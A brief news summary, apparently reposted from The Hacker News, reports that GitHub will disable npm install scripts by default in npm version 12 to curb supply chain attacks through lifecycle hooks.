Home/News/GitHub to Disable npm Install Scripts by Default to Stop Supply Chain Attacks
The Hacker News2 min read

GitHub to Disable npm Install Scripts by Default to Stop Supply Chain Attacks

GitHub announced significant changes to npm version 12, including disabling install scripts by default, to mitigate software supply chain attacks. These changes target malicious techniques that exploit the "npm install" command and its lifecycle hooks to execute harmful code. The move aims to enhance the security of the npm ecosystem by preventing the automatic execution of arbitrary scripts during package installation. This proactive measure addresses growing concerns over the integrity of open-source software dependencies and the potential for compromised packages to infiltrate development pipelines. The default disabling of install scripts requires explicit opt-in, forcing developers to consciously approve the execution of these scripts and thereby increasing awareness of potential risks. This update represents a critical step in GitHub's ongoing efforts to secure the software development lifecycle and protect users from sophisticated supply chain threats.

Original source — read the full reporting at the publisher:

Read on The Hacker News

Read next